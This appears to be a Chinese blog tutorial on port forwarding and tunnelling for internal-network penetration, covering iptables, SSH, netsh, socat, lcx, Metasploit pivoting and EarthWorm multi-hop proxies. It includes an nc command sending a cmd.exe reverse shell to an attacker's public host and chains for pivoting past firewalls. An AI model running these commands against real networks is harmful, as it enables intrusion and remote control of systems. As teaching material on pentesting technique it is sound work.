一、内网渗透中的端口转发
需要知道,在渗透的整个流程中,根据 web 应用或者开放的端口进行渗透,获取webshell只是渗透这门艺术的一小部分,在真实的错综复杂的企业环境中进行内网渗透,其实水很深,涉及内网穿透,端口转发,域渗透,提权等一系列的难题。所以这篇文章对内网渗透学习进行一些记录。在这过程中参考了很多前辈们的宝贵经验,我把这些链接进行了收集,放在参考文献部分。
二、转发,映射,代理
这几个概念其实是比较难区分的,特别是和后面的内网穿透混在一起,在宏观上说,他们差别不大。但是究其本质还是存在不小的差别的。现在就先对这几个概念说一下我个人的理解:
转发:转发是渗透中一种手段,是将一个网络端口从一个网络节点转发到另一个节点的行为。结果是使一个外网用户经过一个NAT路由器到达在内网 IP 地址某个端口。有时候也被称为隧道。
映射:映射也是渗透中的一种手段,端口映射就是将外网主机的 IP 地址的一个端口映射到内网中一台机器,提供相应的服务。其实很多时候转发和映射
代理:代理是一种结果,以端口转发和映射为技术基础。代理在很多场合是用在连接互联网的 web 服务上面,起到突破 ip 封锁,隐匿身份等作用。其原理是动态的端口转发。只需要本机和代理间建立一个隧道,然后代理就可以根据本机发起的请求去动态的获取出链的地址与端口。
内网穿透:内网穿透是目的,它使用的手段有包括端口转发和映射,或者直接使用代理这一结果。很多时候我们指的内网穿透场景是指攻击机与靶机处于处于不同的内网中,一些回弹 shell 之类的手段直接实现,因为 IP 地址无法相互建立连接。这个时候就需要使用一些内网穿透常见的工具。这些工具也是使用端口转发和映射或类似的方法来突破限制。
三、系统内置的转发工具
iptables NAT 功能
由于 linux 主机出于安全考虑,系统参数/proc/sys/net/ipv4/ip_forward 默认为 0,所以是禁止 NAT 功能的,我们可以通过以下两种你方式修改系统运行时的参数。
临时方案
1echo 1 >/proc/sys/net/ipv4/ip_forward
复制代码
长期方案
运行 vi /etc/sysctl.conf
1# 找到下面的值并将0改成123net.ipv4.ip_forward = 1
复制代码
运行 sysctl –p,使改动立即生效 。
下面是一个转发的示例
# 1.1.1.1是公网ip,192.168.2.2内网ip2iptables -t nat -A PREROUTING -p tcp -d 1.1.1.1 --dport 80 -j DNAT --to-destination 192.168.2.2:808034iptables -t nat -A POSTROUTING -p tcp -s 192.168.2.2 --sport 8080 -j SNAT --to-source 1.1.1.156service iptables save
复制代码
这样就会使得访问 1.1.1.1:80 映射到了 192.168.2.2:8080 端口。注意到这里
nc
# 公网主机2nc -lvp 444434# 内网机器5nc -t -e cmd.exe 公网主机ip 4444
复制代码
SSH
1#本地端口转发: 2ssh -CfNg -L port1:127.0.0.1:port2 user@host 3参数: -L 本地网卡地址:本地端口:目标地址:目标端口 4 5#远程端口转发: 6ssh -CfNg -R port2:127.0.0.1:port1 user@hsst 7参数: -R 远程网卡地址:远程端口:目标地址:目标端口 8 9#动态端口转发10ssh -D localhost:2000 root@103.59.22.1711参数:-D 本地网卡地址:本地端口
复制代码
netsh
netsh 是 windows 下提供网络管理的命令行工具,它是一个交互式的 shell,涉及到上下文的概念。我们在交互式下面进入相应的上下文,进行参数的设置。也可以直接下面这样非交互式的进行端口转发。
1netsh interface ipv6 install2#转发3netsh interface portproxy add v4tov4 listenaddress=10.10.18.1 listenport=4455 connectaddress=10.10.12.1 connectport=808045#删除转发6netsh interface portproxy delete v4tov4 listenaddress={B的IP} listenport={B的端口}
复制代码
四、非内置的端口转发工具
socat
socat 这个端口转发我们其实更常用在 ssrf 构造 payload 的时候本地抓包,因为 socat 有记录转发流的功能。将 socat 作为中介捕获我们构造的 payload 包,然后进行进一步的操作,如 gopher 协议的构造。
1#安装 2yum install -y socat 3apt install -y socat 4 5#TCP 6nohup socat TCP4-LISTEN:10000,reuseaddr,fork TCP4:1.1.1.1:10000 7 8TCP4-LISTEN:10000 监听 ipv4 的 10000TCP 端口。 10000 改成你自己需要转发的端口 9fork TCP4:1.1.1.1:10000 转发到 1.1.1.1 的 10000 端口,根据需求修改自行修改 ip 和端口10nohup 后台运行。可以把这个命令写到 /etc/rc.local 里面开机启动启动。1112#UDP13nohup socat -T 600 UDP4-LISTEN:10000,reuseaddr,fork UDP4:1.1.1.1:10000
复制代码
lcx.exe
1lcx-<listen|tran|slave> <option> [-log logfile] 2[option:] 3 4 -listen <监听端口> <转发端口> 5 6 -tran<监听端口> <目标地址> <目标端口> 7 8 -slave <目标主机> <目标端口> <本地主机><本机端口> 91011内网机器上执行:12lcx.exe –slave 公网IP +端口 内网IP +端口13例: 14lcx.exe –slave 192.168.43.142 51 192.168.43.137 338915公网上执行:16Lcx.exe –listen 监听51端口,转发到公网机器的3389端口17例: 18Lcx.exe –listen 51 3389
复制代码
Metasploit socks4a
一组在实际渗透过程中的三件套:路由表+socks4a+proxychains。这样一来可以使用攻击机上的渗透工具,利用 meterpreter session 作为跳板,对内网进行渗透。下面的是流程。
11. 在反弹的shell中添加路由,如2run autoroute -s 192.168.122.0/2432. 使用socks4a模块并设置端口4use auxiliary/server/socks4a53. 配置proxychains
复制代码
Meterpreter portfwd
在 MSF 渗透框架里面内置了端口转发的命令,在回弹了 shell 的条件下可以直接使用,下面式相关参数解析。
1meterpreter > portfwd -h 2Usage: portfwd [-h] [add | delete | list | flush] [args] 3 4 5OPTIONS: 6 7 -L <opt> 转发: 本地监听地址 反向: 本地主机连接到某个地址 8 -R 表示正向反向端口 9 -h 帮助信息10 -i <opt> 端口转发条目的索引与交互(请参阅“列表”命令)11 -l <opt> 转发:本地端口收听 反向:本地端口连接12 -p <opt> 转发:远程端口连接 反向:远程端口监听13 -r <opt> 转发:连接到远程主机141516例子:17portfwd -L 127.0.0.1 -l 1212 -r 10.10.12.1 -p 3389
复制代码
Rinetd
1# 安装,注意到centos没有其默认的软件源,需要手动导入;ubuntu的比较方便 2#centos 32 3$ vim /etc/yum.repos.d/nux-misc.repo 4[nux-misc] 5name=Nux Misc 6baseurl=http://li.nux.ro/download/nux/misc/el6/i386/ 7enabled=0 8gpgcheck=1 9gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro1011#centos 6412$ vim /etc/yum.repos.d/nux-misc.repo:1314[nux-misc]15name=Nux Misc16baseurl=http://li.nux.ro/download/nux/misc/el6/x86_64/17enabled=018gpgcheck=119gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro2021$ yum --enablerepo=nux-misc install rinetd2223# ubuntu24$ apt-get install rinetd2526#配置文件在/etc/rinetd.conf,配置参数格式27[bindaddress] [bindport] [connectaddress] [connectport]28绑定的地址 绑定的端口 连接的地址 连接的端口2930[Source Address] [Source Port] [Destination Address] [Destination Port]31源地址 源端口 目的地址 目的端口3233#举例34$ vim /etc/rinetd.conf35360.0.0.0 8080 172.19.94.3 8080370.0.0.0 2222 192.168.0.103 3389381.2.3.4 80 192.168.0.10 8039allow *.*.*.*40logfile /var/log/rinetd.log4142#解释430.0.0.0表示本机绑定所有可用地址44将所有发往本机8080端口的请求转发到172.19.94.3的8080端口45将所有发往本机2222端口的请求转发到192.168.0.103的3389端口46将所有发往1.2.3.4的80端口请求转发到192.168.0.10的80端口47allow设置允许访问的ip地址信息,*.*.*.*表示所有IP地址48logfil设置打印的log的位置4950# 运行51#脚本启动52$ /etc/init.d/rinetd start5354#二进制启动55$ /usr/sbin/rinetd -c /etc/rinetd.conf5657#关闭(使用脚本,或则和pkill)58$ /etc/init.d/rinetd stop
复制代码
Tunna 与 reGeorg
这两个工具的使用都是比较简单,就不啰嗦了,在获取 webshell 后,我们可以通过 http 进行端口转发。直接给出两个项目地址,推荐使用 reGeorg,Tunna 不稳定。Tunna 工具地址
Localtunnel 与 Gnork
这两个工具都可以将内网的端口映射到公网,然后访问公网的 ip 就类似于访问内网的端口。这两个工具可以提供自建服务或者使用它提供的服务器进行内网穿透。其实这类工具在实际渗透中不是很常用。更直接的场景是自己攻击机在内网,在进行相关回连操作的时候,需要目标机器可达,毕竟它们只是一级转发,而且操作麻烦。直接给出项目地址
https://github.com/localtunnel/localtunnel
https://ngrok.com/
EW
工具的地址:http://rootkiter.com/EarthWorm/
这是个国产的打洞神器,因为其方便的多级转发,支持反向代理等特性,在内网渗透领域可是响当当的。这里重点对这个工具做下记录,真的太强大了
该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。下面针对官方的例子进行以下解释:
正向代理
1$ ./ew -s ssocksd -l 1080
复制代码
开启机器的 1080 端口做正向代理,我们可以通过链接该机器的 1080 端口进行端口代理转发。一般的场景为:kali 通过 proxychain 链接开启了正向代理的公网 ip。
反响代理
1#公网ip主机A,ip假设为1.1.1.12./ew -s rcsocks -l 1080 -e 8888 34# 目标机B5./ew -s rssocks -d 1.1.1.1 -e 8888
复制代码
反向代理是目标机向我们发起链接请求,与正向代理是不一样的。当建立了链接后,它的代理流如下 Me<--->A<--->B。即我只要连接 A 的 1080 端口就可以获得一条反向代理的隧道,与 B 建立连接。这种场景可以用来绕过入口策略严格但是出口策略松散的防火墙。
多级转发
在前面的两个场景中,我们看到了 rcsocks,`ssocksd,rssocks 这三个命令的使用。在多级转发中我们会见到另外三个命令的作用。他们就类似于中间件,负责隧道导流与串接。
1#命令使用举例:2# lcx_listen 用在将本机的端口进行转发3$ ./ew -s lcx_listen -l 1080 -e 88884# lcx_tran 将本机端口与目的ip地址的端口进行转发5$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 99996# lcx_slave 作为奴隶,将本机直接可达的两个主机实体上的端口进行转发7$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
复制代码
下面我们来看个实际渗透三级级联例子:
1# 我们自己的VPS执行 2$ ./ew -s rcsocks -l 1080 -e 8888 3 4# 跳板机A执行 5$ ./ew -s lcx_slave -d ip_A -e 8888 -f ip_B -g 9999 6 7# 跳板机B执行 8$ ./ew -s lcx_listen -l 9999 -e 7777 910# 跳板机C执行11$ ./ew -s rssocks -d ip_B -e 7777
复制代码
数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks。
我们来解读以下这个三级级联,首先这是个反向代理的例子,反向代理的目的端口是 C 的 7777,当隧道建立完成,我们只需要连接到 VPS 的 1080 端口,就会自动帮我们转发到 7777。我们来看下中间过程如何:首先第一个命令 VPS 在 8888 接收反向代理,并且在 1080 等候我们的连接。第二条命令将跳板机 A 的 8888 端口导向 9999;第三行命令将跳板机 B 的 9999 端口导向 7777;最后第四条命令在跳板机上进行反向代理发起连接到跳板机 B 的 7777 端口。
FRP
frp 也提供了完善的内网穿透的功能,功能上其实和 gnork 这些差不多,但是相比起来,FRP 的配置更为灵活。推荐层度:FRP>Localtunnel>gnork
五、过墙隧道
前面介绍的端口转发,有使用 http 协议,tcp 协议,sockts 代理的,但是这些协议转发流量太过于碍眼,容易被严谨的防火墙规则过滤,导致 shell 从内网出不来,那么在这种情况下,我们就需要强有力的过墙隧道。下面是笔者在网上搜罗的一些走 udp 的 dns 隧道和走 icmp 的隧道,可以说这两种打洞手段很别出心裁,笔者看得是叹为观止。这里先把相关的工具链接和看过的资料记录下来。写不动了……,避免篇幅过长(其实是有点懒),下次补上。↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
评论